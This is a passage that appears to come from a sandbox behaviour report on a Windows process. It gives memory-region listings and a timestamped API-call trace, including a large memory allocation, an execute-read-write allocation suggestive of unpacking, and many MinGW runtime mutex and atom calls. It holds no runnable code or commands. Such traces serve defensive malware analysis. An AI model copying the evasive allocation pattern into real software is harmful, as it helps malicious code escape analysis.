Region: id = 2106 start_va = 0x2790000 end_va = 0x27cbfff monitored = 0 entry_point = 0x279128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2107 start_va = 0x74020000 end_va = 0x7405afff monitored = 0 entry_point = 0x7402128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2108 start_va = 0x2970000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 2109 start_va = 0x2a70000 end_va = 0x2c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 2110 start_va = 0x67820000 end_va = 0x67835fff monitored = 0 entry_point = 0x67822061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 2111 start_va = 0x520000 end_va = 0x529fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 2112 start_va = 0x67450000 end_va = 0x6746bfff monitored = 0 entry_point = 0x6745145e region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\SysWOW64\\cryptnet.dll" (normalized: "c:\\windows\\syswow64\\cryptnet.dll") Region: id = 2113 start_va = 0x772d0000 end_va = 0x77314fff monitored = 0 entry_point = 0x772d11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 2114 start_va = 0x27c0000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 2115 start_va = 0x2c70000 end_va = 0x2caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 2116 start_va = 0x2cb0000 end_va = 0x8c0efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 2117 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2118 start_va = 0x2720000 end_va = 0x2743fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 2119 start_va = 0x2790000 end_va = 0x27b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 2120 start_va = 0x68a80000 end_va = 0x68ad7fff monitored = 0 entry_point = 0x68a813b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 2121 start_va = 0x68a30000 end_va = 0x68a7efff monitored = 0 entry_point = 0x68a31452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 2122 start_va = 0x2cb0000 end_va = 0x2d6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2123 start_va = 0x74280000 end_va = 0x74285fff monitored = 0 entry_point = 0x74281673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 2124 start_va = 0x75300000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75302012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 2125 start_va = 0x67840000 end_va = 0x67851fff monitored = 0 entry_point = 0x67843271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 2126 start_va = 0x74230000 end_va = 0x74267fff monitored = 0 entry_point = 0x7423990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2127 start_va = 0x2d70000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 2128 start_va = 0x77030000 end_va = 0x771ccfff monitored = 0 entry_point = 0x770317e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2129 start_va = 0x77580000 end_va = 0x775a6fff monitored = 0 entry_point = 0x775858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2130 start_va = 0x76bf0000 end_va = 0x76c01fff monitored = 0 entry_point = 0x76bf1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2131 start_va = 0x2120000 end_va = 0x212cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 2132 start_va = 0x2e10000 end_va = 0x8d6efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 2134 start_va = 0x2800000 end_va = 0x2823fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 2135 start_va = 0x28e0000 end_va = 0x2906fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 2136 start_va = 0x68ae0000 end_va = 0x68af4fff monitored = 0 entry_point = 0x68ae11fa region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 2137 start_va = 0x67440000 end_va = 0x6744dfff monitored = 0 entry_point = 0x67441289 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\SysWOW64\\devrtl.dll" (normalized: "c:\\windows\\syswow64\\devrtl.dll") Region: id = 2145 start_va = 0x2e10000 end_va = 0x8d6efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 2146 start_va = 0x27c0000 end_va = 0x27e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 2147 start_va = 0x2910000 end_va = 0x2936fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 2148 start_va = 0x2500000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 2149 start_va = 0x2d80000 end_va = 0x2dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 2150 start_va = 0x2dd0000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 2151 start_va = 0x2e10000 end_va = 0x8d6efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 2152 start_va = 0x2460000 end_va = 0x2483fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 2153 start_va = 0x2490000 end_va = 0x24b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 2154 start_va = 0x2e10000 end_va = 0x2e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 2155 start_va = 0x2f10000 end_va = 0x2f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 2156 start_va = 0x2f50000 end_va = 0x8eaefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2157 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2158 start_va = 0x2540000 end_va = 0x2563fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 2159 start_va = 0x2c70000 end_va = 0x2c96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 2160 start_va = 0x2f50000 end_va = 0x8eaefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2161 start_va = 0x2e50000 end_va = 0x2e73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 2162 start_va = 0x2e80000 end_va = 0x2ea6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 2163 start_va = 0x2f50000 end_va = 0x8eaefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2164 start_va = 0x2630000 end_va = 0x2653fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 2165 start_va = 0x2890000 end_va = 0x28b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 2166 start_va = 0x2d90000 end_va = 0x2dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 2167 start_va = 0x30d0000 end_va = 0x310ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 2168 start_va = 0x3110000 end_va = 0x906efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 2169 start_va = 0x2500000 end_va = 0x2523fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 2170 start_va = 0x2eb0000 end_va = 0x2ed6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 2185 start_va = 0x3110000 end_va = 0x906efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 2190 start_va = 0x2ee0000 end_va = 0x2f03fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 2191 start_va = 0x2f50000 end_va = 0x2f76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2192 start_va = 0x2ff0000 end_va = 0x302ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 2193 start_va = 0x31f0000 end_va = 0x322ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 2194 start_va = 0x3230000 end_va = 0x918efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 2195 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 2196 start_va = 0x2e10000 end_va = 0x2e33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 2197 start_va = 0x2f10000 end_va = 0x2f36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 2198 start_va = 0x3230000 end_va = 0x918efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 2199 start_va = 0x2f80000 end_va = 0x2fa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 2200 start_va = 0x2fb0000 end_va = 0x2fd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 2205 start_va = 0x3070000 end_va = 0x30affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 2206 start_va = 0x31a0000 end_va = 0x31dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 2207 start_va = 0x3230000 end_va = 0x918efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 2208 start_va = 0x2d70000 end_va = 0x2d93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 2209 start_va = 0x2da0000 end_va = 0x2dc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 2210 start_va = 0x3230000 end_va = 0x918efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 2211 start_va = 0x3030000 end_va = 0x3053fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2212 start_va = 0x30b0000 end_va = 0x30d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 2213 start_va = 0x32e0000 end_va = 0x331ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 2214 start_va = 0x3390000 end_va = 0x33cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 2215 start_va = 0x33d0000 end_va = 0x932efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 2216 start_va = 0x2fe0000 end_va = 0x3003fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 2217 start_va = 0x30e0000 end_va = 0x3106fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 2233 start_va = 0x33d0000 end_va = 0x932efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 2234 start_va = 0x3110000 end_va = 0x3133fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 2235 start_va = 0x3140000 end_va = 0x3166fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Thread: id = 97 os_tid = 0xe24 [0139.183] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf5b4 | out: lpSystemTimeAsFileTime=0x2cf5b4*(dwLowDateTime=0x8e69ad60, dwHighDateTime=0x1d806e7)) [0139.183] GetCurrentProcessId () returned 0xe20 [0139.183] GetCurrentThreadId () returned 0xe24 [0139.183] GetTickCount () returned 0x1b4688f [0139.183] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf5bc | out: lpPerformanceCount=0x2cf5bc*=2874687076378) returned 1 [0139.184] malloc (_Size=0x80) returned 0x3a27d0 [0139.184] __dllonexit () returned 0x6ab0c6c0 [0139.184] malloc (_Size=0x5f5e100) returned 0x2020020 [0142.446] atoi (_Str="8192") returned 8192 [0142.446] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x160000 [0142.451] malloc (_Size=0x3afd) returned 0x3a40d8 [0142.452] malloc (_Size=0x3afd) returned 0x3a7be0 [0142.467] strlen (_Str="use_fc_key") returned 0xa [0142.467] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-use_fc_key") returned 0x138 [0142.467] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0142.467] FindAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.468] malloc (_Size=0x4) returned 0x3a1448 [0142.468] AddAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaaAAAaAaaaaAaAaaaAaaAaa") returned 0xc000 [0142.468] GetAtomNameA (in: nAtom=0xc000, lpBuffer=0x2cf3d0, nSize=59 | out: lpBuffer="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaaAAAaAaaaaAaAaaaAaaAaa") returned 0x3a [0142.468] ReleaseMutex (hMutex=0x138) returned 1 [0142.468] CloseHandle (hObject=0x138) returned 1 [0142.469] strlen (_Str="sjlj_once") returned 0x9 [0142.469] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-sjlj_once") returned 0x138 [0142.469] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0142.469] FindAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.470] malloc (_Size=0x4) returned 0x3a1458 [0142.470] AddAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaaAAAaAaaaaAaAaaaAaAAaa") returned 0xc001 [0142.470] GetAtomNameA (in: nAtom=0xc001, lpBuffer=0x2cf3b0, nSize=58 | out: lpBuffer="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaaAAAaAaaaaAaAaaaAaAAaa") returned 0x39 [0142.470] ReleaseMutex (hMutex=0x138) returned 1 [0142.470] CloseHandle (hObject=0x138) returned 1 [0142.470] strlen (_Str="once_global_shmem") returned 0x11 [0142.470] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_global_shmem") returned 0x138 [0142.470] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0142.470] FindAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.470] malloc (_Size=0x10) returned 0x3a1468 [0142.470] AddAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaaAAAaAaaaaAaAaaaAAaAaa") returned 0xc002 [0142.470] GetAtomNameA (in: nAtom=0xc002, lpBuffer=0x2cf340, nSize=65 | out: lpBuffer="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaaAAAaAaaaaAaAaaaAAaAa") returned 0x40 [0142.471] ReleaseMutex (hMutex=0x138) returned 1 [0142.471] CloseHandle (hObject=0x138) returned 1 [0142.471] strlen (_Str="once_obj_shmem") returned 0xe [0142.471] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_obj_shmem") returned 0x138 [0142.471] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0142.471] FindAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.471] malloc (_Size=0x4) returned 0x3a1480 [0142.471] AddAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaaAAAaAaaaaAaAaaAaaaaaa") returned 0xc003 [0142.471] GetAtomNameA (in: nAtom=0xc003, lpBuffer=0x2cf350, nSize=62 | out: lpBuffer="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaaAAAaAaaaaAaAaaAaaaaa") returned 0x3d [0142.471] ReleaseMutex (hMutex=0x138) returned 1 [0142.471] CloseHandle (hObject=0x138) returned 1 [0142.471] calloc (_Count=0x1, _Size=0x10) returned 0x3a1490 [0142.471] strlen (_Str="mutex_global_shmem") returned 0x12 [0142.471] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_shmem") returned 0x138 [0142.472] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0142.472] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.472] malloc (_Size=0x10) returned 0x3a2858 [0142.472] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaaAaAAaa") returned 0xc004 [0142.472] GetAtomNameA (in: nAtom=0xc004, lpBuffer=0x2cf2f0, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaaAaAAa") returned 0x41 [0142.472] ReleaseMutex (hMutex=0x138) returned 1 [0142.472] CloseHandle (hObject=0x138) returned 1 [0142.472] calloc (_Count=0x1, _Size=0x1c) returned 0x3a2870 [0142.472] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x138 [0142.472] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0142.472] GetCurrentThreadId () returned 0xe24 [0142.472] strlen (_Str="_pthread_tls_once_shmem") returned 0x17 [0142.473] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_once_shmem") returned 0x134 [0142.473] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0142.473] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.473] malloc (_Size=0x4) returned 0x3a2898 [0142.473] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaAaaAAaa") returned 0xc005 [0142.473] GetAtomNameA (in: nAtom=0xc005, lpBuffer=0x2cf310, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaAaaAAa") returned 0x46 [0142.473] ReleaseMutex (hMutex=0x134) returned 1 [0142.473] CloseHandle (hObject=0x134) returned 1 [0142.473] calloc (_Count=0x1, _Size=0x10) returned 0x3a28a8 [0142.473] calloc (_Count=0x1, _Size=0x1c) returned 0x3a28c0 [0142.473] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x134 [0142.473] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0142.474] GetCurrentThreadId () returned 0xe24 [0142.474] strlen (_Str="_pthread_tls_shmem") returned 0x12 [0142.474] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_shmem") returned 0x13c [0142.474] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0142.474] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.474] malloc (_Size=0x4) returned 0x3a28e8 [0142.474] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaAAAaAaa") returned 0xc006 [0142.474] GetAtomNameA (in: nAtom=0xc006, lpBuffer=0x2cf2d0, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaAAAaAa") returned 0x41 [0142.475] ReleaseMutex (hMutex=0x13c) returned 1 [0142.475] CloseHandle (hObject=0x13c) returned 1 [0142.475] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0142.475] CloseHandle (hObject=0x134) returned 1 [0142.475] free (_Block=0x3a28c0) [0142.475] free (_Block=0x3a28a8) [0142.475] strlen (_Str="mtx_pthr_locked_shmem") returned 0x15 [0142.475] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mtx_pthr_locked_shmem") returned 0x134 [0142.475] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0142.475] FindAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.475] malloc (_Size=0x4) returned 0x3a28a8 [0142.475] AddAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaAaAaAaa") returned 0xc007 [0142.475] GetAtomNameA (in: nAtom=0xc007, lpBuffer=0x2cf2f0, nSize=69 | out: lpBuffer="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaAaAaAa") returned 0x44 [0142.476] ReleaseMutex (hMutex=0x134) returned 1 [0142.476] CloseHandle (hObject=0x134) returned 1 [0142.476] strlen (_Str="mutex_global_static_shmem") returned 0x19 [0142.476] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_static_shmem") returned 0x134 [0142.476] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0142.476] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.476] malloc (_Size=0x10) returned 0x3a28b8 [0142.476] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaAaAAAaa") returned 0xc008 [0142.476] GetAtomNameA (in: nAtom=0xc008, lpBuffer=0x2cf280, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaAaAAAa") returned 0x48 [0142.476] ReleaseMutex (hMutex=0x134) returned 1 [0142.476] CloseHandle (hObject=0x134) returned 1 [0142.476] strlen (_Str="mxattr_recursive_shmem") returned 0x16 [0142.476] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mxattr_recursive_shmem") returned 0x134 [0142.477] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0142.477] FindAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.477] malloc (_Size=0x4) returned 0x3a28d0 [0142.477] AddAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaAAaAaaa") returned 0xc009 [0142.477] GetAtomNameA (in: nAtom=0xc009, lpBuffer=0x2cf280, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaaAAAaAaaaAaAaaaAAaAaa") returned 0x45 [0142.477] ReleaseMutex (hMutex=0x134) returned 1 [0142.477] CloseHandle (hObject=0x134) returned 1 [0142.477] calloc (_Count=0x1, _Size=0x1c) returned 0x3a28f8 [0142.477] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x134 [0142.477] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0142.477] GetCurrentThreadId () returned 0xe24 [0142.477] strlen (_Str="pthr_root_shmem") returned 0xf [0142.477] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-pthr_root_shmem") returned 0x13c [0142.477] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0142.477] FindAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.477] malloc (_Size=0x4) returned 0x3a2920 [0142.477] AddAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaaAAAaAaaaAaAaaAaaAaaaa") returned 0xc00a [0142.477] GetAtomNameA (in: nAtom=0xc00a, lpBuffer=0x2cf300, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaaAAAaAaaaAaAaaAaaAaaa") returned 0x3e [0142.478] ReleaseMutex (hMutex=0x13c) returned 1 [0142.478] CloseHandle (hObject=0x13c) returned 1 [0142.478] calloc (_Count=0x1, _Size=0xc0) returned 0x3a2930 [0142.478] strlen (_Str="idListCnt_shmem") returned 0xf [0142.478] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListCnt_shmem") returned 0x13c [0142.478] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0142.478] FindAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0142.478] malloc (_Size=0x4) returned 0x3a29f8 [0142.479] AddAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaaAAAaAaaaAaAaaAAAAAAaa") returned 0xc00b [0142.479] GetAtomNameA (in: nAtom=0xc00b, lpBuffer=0x2cf2d0, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaaAAAaAaaaAaAaaAAAAAAa") returned 0x3e [0142.479] ReleaseMutex (hMutex=0x13c) returned 1 [0142.479] CloseHandle (hObject=0x13c) returned 1 [0142.479] strlen (_Str="idListMax_shmem") returned 0xf 